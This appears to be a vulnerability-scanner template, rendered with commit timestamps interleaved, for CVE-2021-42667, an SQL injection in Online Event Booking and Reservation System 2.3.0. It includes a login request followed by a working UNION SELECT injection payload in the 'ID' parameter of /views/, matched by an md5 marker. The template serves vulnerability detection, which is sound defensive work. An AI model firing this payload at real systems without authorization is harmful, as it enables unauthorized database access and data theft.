2022-09-03 06:26:47 +00:00
id : CVE-2021-42667
info :
2022-09-29 13:38:41 +00:00
name : Online Event Booking and Reservation System 2.3.0 - SQL Injection
2022-09-03 06:26:47 +00:00
author : fxploit
severity : critical
description : |
2022-09-29 13:38:41 +00:00
Online Event Booking and Reservation System 2.3.0 contains a SQL injection vulnerability in event-management/views. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-09-03 06:26:47 +00:00
reference :
- https://github.com/0xDeku/CVE-2021-42667
- https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html
2022-09-05 19:01:12 +00:00
- https://github.com/TheHackingRabbi/CVE-2021-42667
2022-09-29 13:38:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-42667
2022-09-03 06:26:47 +00:00
classification :
2022-09-05 19:01:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-09-03 06:26:47 +00:00
cve-id : CVE-2021-42667
2022-09-05 19:01:12 +00:00
cwe-id : CWE-89
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:online_event_booking_and_reservation_system_project:online_event_booking_and_reservation_system:*:*:*:*:*:*:*:*
epss-score : 0.01689
2022-09-04 09:20:14 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-06-04 08:13:42 +00:00
verified : true
2022-09-04 09:20:14 +00:00
tags : cve,cve2021,sqli,authenticated
variables :
num : "999999999"
2022-09-03 06:26:47 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-09-04 09:20:14 +00:00
- raw :
- |
POST /login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
name={{username}}&pwd={{password}}
- |
GET /views/?v=USER&ID=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2Cmd5({{num}})%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%3B--%20- HTTP/1.1
Host : {{Hostname}}
2022-09-03 06:26:47 +00:00
2022-10-07 21:27:25 +00:00
host-redirects : true
2022-09-04 09:20:14 +00:00
max-redirects : 2
cookie-reuse : true
2022-09-03 06:26:47 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-09-04 09:20:14 +00:00
- '{{md5(num)}}'
2022-09-03 06:26:47 +00:00
- type : status
status :
- 200
2022-09-29 13:38:41 +00:00
# Enhanced by mp on 2022/09/28